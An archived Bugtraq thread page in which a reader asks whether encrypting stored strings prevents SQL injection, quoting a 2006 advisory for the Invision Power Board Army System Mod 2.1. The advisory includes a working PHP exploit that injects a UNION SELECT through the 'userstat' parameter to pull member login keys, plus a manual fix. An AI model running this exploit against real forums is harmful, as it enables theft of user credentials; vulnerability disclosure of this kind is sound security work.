Bugtraq mailing list archives
Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit
From: Cristian Stoica <security () netcms biz>
Date: Tue, 14 Feb 2006 01:29:05 +0200
Hi, I have a question:If you use an ecryption algorithm to store/get data into/from the database you will not be able to do SQL injections ? With a simple encryption algorithm, I do with php explode, transform the string into an array and run the algorithm on each member of the array. After this is done I convert from array to string and insert/select into/from the database. This way if I have let's say the string "Hello world" I will get the correct information if I try to run a select * from table where name like "Hello %" With this I think I will not be vulnerable to SQL injection and I will also have the information in the database secure.
What do you think about this ? Best regards, Cristian Stoica P.S.: I know it will take a bit longer, but I think it's ok. unsecure () writeme com wrote:
VULNERABLE PRODUCT ----------------------------------- Invision Power Board Army System Mod Version: 2.1 and priors. Url: http://supersmashbrothers.2ya.com Vulnerability: Remote SQL Injection ----------------------------------------------------- BACKGROUND ---------------------------- Army System v2.1 is a very popular mods that has a ranking system built-in. This multiple player rpg can easily be installed on every Invision Power Board v2.x.x Source: "http://mods.invisionize.com/db/index.php/f/3347"; Google: "Army System 2.1 by supersmashbrothers" ******************************************************************** Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0 Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL Any sql will work fine as long as you have the driver. Minimum MySQL: 3.23 Recommended MySQL: 3.23 or better Recommended for Larger sites: No memory limit and no safe mode for faster loading ******************************************************************** VULNERABILITY -------------------------------Army System is prone to a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input passed to the "userstat" parameter is not correctly sanitised before being used in a SQL query. A specially crafted URL could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.EXPLOIT ---------------- <?php /* --------------------------- EXPLOIT --------------------------- Invision Power Board Army System Mod 2.1 SQL Injection Exploit Tested on: Latest version (2.1.0) Discovered on: 06.02.2006 by Alex & fRoGGz Credits to: SecuBox Labs PLEASE READ THIS ! The query of the SQL Injection depends about the number of fields in the sql tableWe have successfully tested the exploit on a new fresh IPB 2.1.x with Army System Mod 2.1 installedIN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIALDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS ORSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ $target = "http://site.com/forums/";; // <--- Where ? $prefix = "ibf_"; // <--- SQL prefix ? $id = 1; // <--- Who ? print_r(get_infos($target,$prefix,$id)); if(!get_infos($target,$prefix,$id)) echo "failed"; function get_infos($target,$prefix,$id) { $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,"; $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,"; $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,"; $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"; $inject.= "NULL+FROM+".$prefix."members+WHERE+id="; $filename = $target . $inject . $id; $handle = fopen ($filename, "r"); $infos = array(); if (feof($handle)) { continue 2; } if ( $handle ) { while ( ($buffer = fgets( $handle )) ) { if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) { $infos['md5'] = strip_tags ( fgets( $handle) ); break; } } } fclose ($handle); if (count($infos) == 1) return $infos; return false; } ?> VENDOR STATUS --------------------------- There is no solution at the time. Edit the source code manually to solve this problem & many others ! // You could temporary fix the problem: // Find sources/action_public/army.php (line 486:$id2 = $this->ipsclass->input['ID']; // After the line put: $id2 = ereg_replace('([^0-9])','',$id2); $id2 = (int)$id2; ----------------------------------------------------------------------------- CREDiTS ------------------------------ SecuBox Labs - fRoGGz & Alex Greet's fly out to: Mark aka MT Visit: http://secubox.shadock.net --------------------------------------------
Current thread:
- Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit unsecure (Feb 13)
- Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit Cristian Stoica (Feb 15)
- Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit Crispin Cowan (Feb 21)
- Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit Angelos D. Keromytis (Feb 21)
- Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit Crispin Cowan (Feb 21)
- Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit Cristian Stoica (Feb 15)